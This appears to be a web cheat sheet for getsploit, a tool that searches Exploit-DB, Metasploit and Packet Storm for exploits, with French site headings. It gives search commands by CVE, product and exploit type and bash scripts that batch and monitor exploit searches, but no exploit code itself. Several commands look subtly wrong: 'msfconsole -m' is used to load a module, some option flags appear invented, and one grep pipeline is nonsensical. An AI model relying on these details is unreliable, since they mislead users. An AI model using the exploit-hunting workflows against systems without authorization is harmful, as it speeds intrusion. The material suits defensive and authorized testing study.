Aller au contenu
1337skills 1337skills - Aide-mémoires

getsploit

Overview

Section intitulée « Overview »

getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.

getsploit is essential for:

  • Exploit proof-of-concept research
  • Vulnerability validation and verification
  • Penetration testing and assessment
  • Exploit code adaptation and customization
  • Security research and analysis
  • Attack surface evaluation

Installation

Section intitulée « Installation »

Prerequisites

Section intitulée « Prerequisites »
  • Python 3.6+
  • pip (Python package manager)
  • Linux/macOS/Windows
  • Internet connectivity

Install via pip

Section intitulée « Install via pip »
# Install from PyPI
pip install getsploit

# Verify installation
getsploit -V
getsploit --help

Install from Source

Section intitulée « Install from Source »
# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit

# Install dependencies
pip install -r requirements.txt

# Run directly
python -m getsploit --help

# Or install locally
pip install -e .

Update

Section intitulée « Update »
# Update to latest version
pip install --upgrade getsploit

# Check version
getsploit --version

Core Commands

Section intitulée « Core Commands »

Basic Usage

Section intitulée « Basic Usage »
CommandPurposeExample
getsploit <query>Search for exploitsgetsploit apache 2.4.49
getsploit -hShow helpgetsploit -h
getsploit -VShow versiongetsploit -V
getsploit --updateUpdate exploit databasegetsploit --update

Search Options

Section intitulée « Search Options »
OptionPurposeExample
-e, --edbSearch Exploit-DB onlygetsploit -e "CVE-2021-1234"
-m, --msfSearch Metasploit onlygetsploit -m "windows privilege"
-p, --pstSearch Packet Storm onlygetsploit -p "php vulnerability"
-t, --typeFilter by exploit typegetsploit -t "remote" apache

Basic Search Operations

Section intitulée « Basic Search Operations »
Section intitulée « Simple Exploit Search »
# Search all repositories
getsploit apache 2.4.49

# Search by CVE number
getsploit CVE-2021-44228

# Search by application
getsploit wordpress

# Search by vulnerability type
getsploit "remote code execution"

Search with Repository Filter

Section intitulée « Search with Repository Filter »
# Search Exploit-DB only
getsploit -e "nginx privilege escalation"

# Search Metasploit only
getsploit -m "windows domain privilege"

# Search Packet Storm only
getsploit -p "php injection"

Filter by Exploit Type

Section intitulée « Filter by Exploit Type »
# Find remote code execution exploits
getsploit -t "remote" "apache"

# Find local privilege escalation
getsploit -t "local" "kernel"

# Find denial of service
getsploit -t "dos" "dns"

Exploit Database Search Strategies

Section intitulée « Exploit Database Search Strategies »

Search by Vulnerability

Section intitulée « Search by Vulnerability »
# SQL injection exploits
getsploit "sql injection" wordpress

# Cross-site scripting
getsploit "xss" "drupal"

# Path traversal
getsploit "path traversal" php

# Command injection
getsploit "command injection" web

Search by Application

Section intitulée « Search by Application »
# WordPress vulnerabilities
getsploit wordpress

# Drupal exploits
getsploit drupal

# Apache web server
getsploit apache

# PHP framework vulnerabilities
getsploit laravel

Search by OS/Platform

Section intitulée « Search by OS/Platform »
# Windows privilege escalation
getsploit -t "local" "windows"

# Linux kernel exploits
getsploit -t "local" "linux kernel"

# macOS vulnerabilities
getsploit -t "remote" "macos"

Advanced Search Techniques

Section intitulée « Advanced Search Techniques »

Multi-Term Searches

Section intitulée « Multi-Term Searches »
# Combine application and version
getsploit "apache 2.4.49"

# With vulnerability type
getsploit "wordpress 5.0 remote"

# Application and CVE
getsploit "wordpress CVE-2020"

Specific CVE Research

Section intitulée « Specific CVE Research »
# Log4j vulnerability (widespread)
getsploit CVE-2021-44228

# WordPress plugin vulnerability
getsploit CVE-2020-6450

# Kernel privilege escalation
getsploit CVE-2021-22555

Vulnerability Pattern Searches

Section intitulée « Vulnerability Pattern Searches »
# All Struts vulnerabilities
getsploit "apache struts"

# Tomcat exploits
getsploit "tomcat"

# Node.js vulnerabilities
getsploit "node.js" -t "remote"

Download and Extraction

Section intitulée « Download and Extraction »

Download Exploit Code

Section intitulée « Download Exploit Code »
# Search returns exploit information
getsploit apache 2.4.49

# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository

View Exploit Details

Section intitulée « View Exploit Details »
# Search with verbose output
getsploit -v apache 2.4.49

# Review exploit information before download
# - Author
# - Verification status
# - Last updated date

Save Search Results

Section intitulée « Save Search Results »
# Redirect output to file
getsploit wordpress > wordpress_exploits.txt

# Save specific results
getsploit -e "sql injection" > edb_sqli.txt

# Parse results programmatically
getsploit apache 2.4.49 | grep -oE "exploit-[0-9]+|cve-[0-9-]+"

Practical Exploitation Workflows

Section intitulée « Practical Exploitation Workflows »

Vulnerability Assessment Workflow

Section intitulée « Vulnerability Assessment Workflow »
# 1. Identify target technology
# Example: WordPress 5.0 running

# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"

# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"

# 4. Download promising exploits
# (Follow links from search results)

# 5. Analyze code for applicability
# (Test in lab environment first)

Known CVE Exploitation

Section intitulée « Known CVE Exploitation »
# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)

# 2. Find exploits
getsploit CVE-2021-44228

# 3. Search specific sources
getsploit -m CVE-2021-44228    # Metasploit modules
getsploit -e CVE-2021-44228    # Exploit-DB POCs

# 4. Select appropriate exploit
# (Choose by platform, method, complexity)

Application-Specific Research

Section intitulée « Application-Specific Research »
# 1. Identify running application
# Example: Apache Struts 2.0

# 2. Search comprehensively
getsploit "apache struts"

# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"

# 4. Research by year
getsploit "struts 2009"  # Earlier vulnerabilities
getsploit "struts 2017"  # More recent exploits

Integration with Other Tools

Section intitulée « Integration with Other Tools »

Chain with Metasploit

Section intitulée « Chain with Metasploit »
# Find exploit in Metasploit
getsploit -m "apache struts"

# Get module path from results
# Load in msfconsole
msfconsole -m "exploit/linux/http/apache_struts_rce"

Integration with searchsploit

Section intitulée « Integration with searchsploit »
# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"

# Cross-reference with getsploit
getsploit "apache struts" | grep -v "$(searchsploit -t apache struts)"

Organize Results for Testing

Section intitulée « Organize Results for Testing »
# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt

mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt

# Create index
echo "# Exploit Research Results" > exploit_research/README.md

Exploit Classification and Analysis

Section intitulée « Exploit Classification and Analysis »

Classify by Exploitation Method

Section intitulée « Classify by Exploitation Method »
# Remote code execution
getsploit -t "remote" "application"

# Privilege escalation
getsploit -t "local" "privilege"

# Denial of service
getsploit -t "dos" "service"

# Authentication bypass
getsploit "authentication bypass" app

Analyze Exploit Reliability

Section intitulée « Analyze Exploit Reliability »
# Search for verified/tested exploits
getsploit -e "apache"        # Exploit-DB (verified)

# Search for modules
getsploit -m "wordpress"     # Metasploit (tested)

# Review multiple sources
getsploit -p "wordpress"     # Packet Storm (research)

Filter by Exploit Status

Section intitulée « Filter by Exploit Status »
# Recently added exploits
getsploit -e "2024" wordpress

# Older, battle-tested exploits
getsploit -e "2015" linux

# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l

Automation Scripts

Section intitulée « Automation Scripts »

Batch Vulnerability Scanning

Section intitulée « Batch Vulnerability Scanning »
#!/bin/bash
# Search for exploits for multiple CVEs

CVES=(
  "CVE-2021-44228"
  "CVE-2021-22555"
  "CVE-2020-1938"
)

OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"

for cve in "${CVES[@]}"; do
  echo "Researching $cve..."
  getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
  
  # Count exploits found
  COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
  echo "$cve: $COUNT results found"
done

Vulnerability Database Builder

Section intitulée « Vulnerability Database Builder »
#!/bin/bash
# Build database of exploits for target technologies

TARGETS=(
  "wordpress"
  "drupal"
  "joomla"
  "apache"
  "nginx"
)

DB_DIR="exploit_database"
mkdir -p "$DB_DIR"

for target in "${TARGETS[@]}"; do
  echo "Building database for $target..."
  
  # Search all sources
  getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
  getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
  getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
  
  # Create summary
  TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
           $(wc -l < "$DB_DIR/${target}_msf.txt") + \
           $(wc -l < "$DB_DIR/${target}_pst.txt")))
  
  echo "$target: $TOTAL exploits indexed"
done

Continuous Vulnerability Monitoring

Section intitulée « Continuous Vulnerability Monitoring »
#!/bin/bash
# Monitor new exploits for critical applications

MONITOR_TARGETS=(
  "wordpress"
  "apache"
  "openssh"
)

RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"

DATE=$(date +%Y%m%d)

for target in "${MONITOR_TARGETS[@]}"; do
  LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
  CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
  
  # Get current exploits
  getsploit "$target" | sort > "$CURRENT_FILE"
  
  # Compare with previous
  if [ -f "$LATEST_FILE" ]; then
    NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
    if [ -n "$NEW_EXPLOITS" ]; then
      echo "New exploits for $target:"
      echo "$NEW_EXPLOITS"
    fi
  fi
  
  # Update latest
  cp "$CURRENT_FILE" "$LATEST_FILE"
done

Search Result Analysis

Section intitulée « Search Result Analysis »

Parse Search Results

Section intitulée « Parse Search Results »
# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u

# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u

# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"

Compare Sources

Section intitulée « Compare Sources »
# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt

# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt

# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)

# Find in all sources
getsploit wordpress | sort -u > all_wp.txt

Best Practices

Section intitulée « Best Practices »

Responsible Exploit Research

Section intitulée « Responsible Exploit Research »
  • Verify applicability: Confirm vulnerability affects target before exploitation
  • Test in isolated lab: Always test in controlled environment first
  • Review exploit code: Analyze code for malicious intent before execution
  • Maintain documentation: Track exploit usage for reporting
  • Only test authorized targets: Ensure proper authorization before testing
  • Keep audit trail: Document all exploit testing activities
  • Update regularly: Keep exploit database current with --update

Effective Search Strategies

Section intitulée « Effective Search Strategies »
  • Use specific terms: More specific searches yield relevant results
  • Include version numbers: Narrow results with application versions
  • Cross-reference CVEs: Verify CVE numbers with multiple sources
  • Search all repositories: Different sources contain unique exploits
  • Review metadata: Check author, date, and verification status
  • Compare multiple exploits: Select most reliable implementation

Troubleshooting

Section intitulée « Troubleshooting »
IssueSolution
No results foundTry broader search terms or different keywords
Connection errorsCheck internet connectivity; verify target is accessible
Old databaseRun getsploit --update to refresh exploit database
Exploit not foundTry searching by CVE number or different terms
Metasploit resultsVerify Metasploit Framework installation for module paths

Update and Maintenance

Section intitulée « Update and Maintenance »

Keep Database Current

Section intitulée « Keep Database Current »
# Update exploit database
getsploit --update

# Schedule regular updates (cron)
0 0 * * * /usr/local/bin/getsploit --update  # Daily at midnight

Resources

Section intitulée « Resources »

Summary

Section intitulée « Summary »

getsploit aggregates exploit intelligence from multiple authoritative sources:

  1. Exploit-DB - Largest public exploit repository
  2. Metasploit Framework - Professional exploitation platform
  3. Packet Storm Security - Historical vulnerability research

Key capabilities include:

  • Multi-repository exploit searching
  • Flexible filtering by type and source
  • CVE-based vulnerability research
  • Integration with exploitation frameworks
  • Automated vulnerability monitoring

Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.